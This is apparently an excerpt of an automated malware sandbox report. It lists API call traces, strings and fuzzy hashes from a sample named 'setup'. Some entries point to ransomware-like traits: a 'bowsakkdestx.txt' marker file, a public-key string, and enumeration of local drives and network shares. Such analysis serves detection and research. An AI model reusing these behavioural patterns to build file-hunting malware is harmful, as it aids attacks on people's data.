                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                • String ID: bowsakkdestx.txt${"public_key":"
                • API String ID: 2805819797-1771568745
                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __aulldvrm
                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                • API String ID: 1302938615-3129329331
                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                APIs
                • ___unDName.LIBCMT ref: 0043071B
                • _strlen.LIBCMT ref: 0043072E
                • __lock.LIBCMT ref: 0043074A
                • _malloc.LIBCMT ref: 0043075C
                • _malloc.LIBCMT ref: 0043076D
                • _free.LIBCMT ref: 004307B6
                  • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                • _free.LIBCMT ref: 004307AF
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                • String ID:
                • API String ID: 3704956918-0
                • Opcode ID: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                • Opcode Fuzzy Hash: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                APIs
                • timeGetTime.WINMM ref: 00411B1E
                • timeGetTime.WINMM ref: 00411B29
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                • DispatchMessageW.USER32(?), ref: 00411B5C
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                • Sleep.KERNEL32(00000064), ref: 00411B72
                • timeGetTime.WINMM ref: 00411B78
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: MessageTimetime$Peek$DispatchSleep
                • String ID:
                • API String ID: 3697694649-0
                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                APIs
                • __lock.LIBCMT ref: 0042594A
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • _free.LIBCMT ref: 00425970
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • __lock.LIBCMT ref: 00425989
                • ___removelocaleref.LIBCMT ref: 00425998
                • ___freetlocinfo.LIBCMT ref: 004259B1
                • _free.LIBCMT ref: 004259C4
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                • String ID:
                • API String ID: 626533743-0
                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                APIs
                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ___from_strstr_to_strchr
                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                • API String ID: 601868998-2416195885
                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$g9F
                • API String ID: 2102423945-3653307630
                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                APIs
                • __getptd_noexit.LIBCMT ref: 004C5D3D
                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                • __calloc_crt.LIBCMT ref: 004C5D60
                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3123740607-798102604
                • Opcode ID: b00946c8ecf08a401a747019ed9ef378322b2d001c3f0cfd34f22b2a971cc007
                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                • Opcode Fuzzy Hash: b00946c8ecf08a401a747019ed9ef378322b2d001c3f0cfd34f22b2a971cc007
                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _fprintf_memset
                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                • API String ID: 3021507156-3399676524
                • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                APIs
                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Window$CreateShowUpdate
                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                • API String ID: 2944774295-3503800400
                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                APIs
                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                • _memset.LIBCMT ref: 00410C4C
                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocGlobalOpenResource_memset
                • String ID:
                • API String ID: 364255426-0
                • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                APIs
                • __getenv_helper_nolock.LIBCMT ref: 00441726
                • _strlen.LIBCMT ref: 00441734
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • _strnlen.LIBCMT ref: 004417BF
                • __lock.LIBCMT ref: 004417D0
                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                • String ID:
                • API String ID: 2168648987-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                APIs
                • GetLogicalDrives.KERNEL32 ref: 00410A75
                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                • String ID:
                • API String ID: 2560635915-0
                • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                APIs
                • _malloc.LIBCMT ref: 0043B70B
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _free.LIBCMT ref: 0043B71E
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                • DispatchMessageW.USER32(?), ref: 0041F0B6
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                • DispatchMessageW.USER32(?), ref: 0041E546
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                • DispatchMessageW.USER32(?), ref: 0041FA7B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                • DispatchMessageW.USER32(?), ref: 0041FE2B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
